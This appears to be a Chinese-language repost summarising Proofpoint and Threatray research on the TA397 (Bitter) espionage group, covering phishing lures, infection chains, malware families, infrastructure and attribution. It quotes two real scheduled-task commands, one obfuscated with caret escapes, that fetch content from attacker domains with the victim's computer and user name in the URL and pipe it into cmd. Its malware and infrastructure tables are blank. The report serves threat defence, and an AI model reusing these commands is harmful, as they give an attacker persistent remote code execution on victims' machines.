引言
TA397(也称为Bitter)是一个活跃至少八年的网络间谍组织,研究表明其很可能受印度政府支持,专注于针对具有战略利益的地区的组织进行情报收集。本文整合了Proofpoint和Threatray发布的两篇分析文章(Part One和Part Two),详细描述了TA397的攻击活动、恶意软件库、基础设施和归因分析。
关键发现
-
国家支持:Proofpoint威胁研究团队评估,TA397极有可能是为印度政府利益进行情报收集的国家支持威胁行为者。 -
目标范围:该组织主要针对欧洲(与中国、巴基斯坦和印度次大陆邻国有关的实体)、中国和南美洲的政府、外交和国防机构。 -
技术特征:TA397使用计划任务、包含受害者计算机名和用户名的PHP URL模式以及Let’s Encrypt证书作为其操作的显著特征。 -
恶意软件演变:自2016年以来,TA397的恶意软件从简单的下载器发展到功能强大的远程访问木马(RAT),显示出持续的技术进步。 -
操作时间:其手动操作和基础设施活动与印度标准时间(IST)的工作时间一致,表明其可能在印度运营。
攻击活动与目标
TA397主要通过鱼叉式网络钓鱼邮件进行初始访问,使用来自163[.]com、126[.]com、ProtonMail以及巴基斯坦、孟加拉国和马达加斯加政府被盗账户的电子邮件。邮件主题伪装成政府或外交机构的合法通信,例如:
-
“AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS AT THE LEVEL OF EXTERNAL REPRESENTATIONS” -
“PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR” -
“SituationNote : SouthKorea_Martial law Seoul Embassy Advisory” -
“Invitation Embassy of the Islamic Republic of Pakistan Beijing Dec 2024”
这些邮件通常包含RAR压缩的CHM附件或通过文件共享服务提供的链接。目标包括政府、外交和国防机构,重点是与中国、巴基斯坦和印度邻国相关的实体。
感染链与传递方法
TA397的感染链随着时间演变,近期更倾向于使用计划任务来维持持久性。他们使用了多种文件类型,包括LNK、CHM、MSC、IQY和MS Access文件。2024年10月,他们利用了CVE-2024-43572(GrimResource)漏洞。以下是两个计划任务示例:
-
"C:\Windows\System32\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\Users\public\kwe.cc"; Get-Content "C:\Users\public\kwe.cc" | cmd" -
schtasks /create /tn \"Task-S-1-5-42121\" /f /sc minute /mo 18 /tr \"conhost --headless cmd /v:on /c set gz=ht& set gtz=tps:& set 7gg=!gz!!gtz!& set 6hg=!7gg!//p^rin^ce^cle^anit.co^m& c^ur^l !6hg!/d^prin.p^hp?dr=%computername%;%username%|c^m^d\"
这些任务每16-18分钟执行一次,通过PHP URL(如blucollinsoutien[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME)与C2服务器通信。他们的服务器使用Let’s Encrypt证书,特征包括:
-
主题DN:CN=*. -
发行者DN:C=US, O=Let’s Encrypt, CN=R[0-9]+ -
有效期:90天
恶意软件库
TA397的恶意软件库自2016年以来显著演变,以下是主要恶意软件家族的详细描述:
|
|
|
|
|---|---|---|
| ArtraDownloader |
|
|
| Keylogger |
|
|
| WSCSPL Backdoor |
|
|
| BDarkRAT |
|
|
| MuuyDownloader |
|
|
| AlmondRAT |
|
|
| WmRAT |
|
|
| ORPCBackdoor |
|
|
| MiyaRAT |
|
|
| KiwiStealer |
|
|
| KugelBlitz |
|
|
这些恶意软件在系统信息收集和字符串混淆(如加/减字符、XOR、AES-256-CBC)方面显示出一致的编码模式,表明可能由同一开发团队维护。
基础设施分析
TA397的C2和暂存域共分析了122个,数据来源于内部遥测、公共报告和外部研究。这些域通常使用Let’s Encrypt证书,并遵循特定的PHP URL模式。以下是部分示例:
|
|
|
|
|
|
|
|---|---|---|---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
手动操作时间(如05:27 UTC/10:57 IST、13:37 UTC/19:07 IST)与IST工作时间一致,热图显示被动DNS、WHOIS和证书时间戳集中在IST工作时间。
归因与结论
研究表明,TA397很可能是为印度政府进行情报收集的国家支持威胁行为者,目标集中在印度战略利益相关的地区。其一致的TTP(如计划任务、PHP URL模式、Let’s Encrypt证书)和八年来恶意软件的演变显示出其复杂性和持久性。有关更多详细信息和IOC,请参阅Threatray的GitHub存储库(Threatray GitHub)。
原文链接:
-
https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one -
https://www.threatray.com/blog/the-bitter-end-unraveling-eight-years-of-espionage-antics-part-two
原文始发于微信公众号(独眼情报):针对我国的印度 apt 间谍活动全面解析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论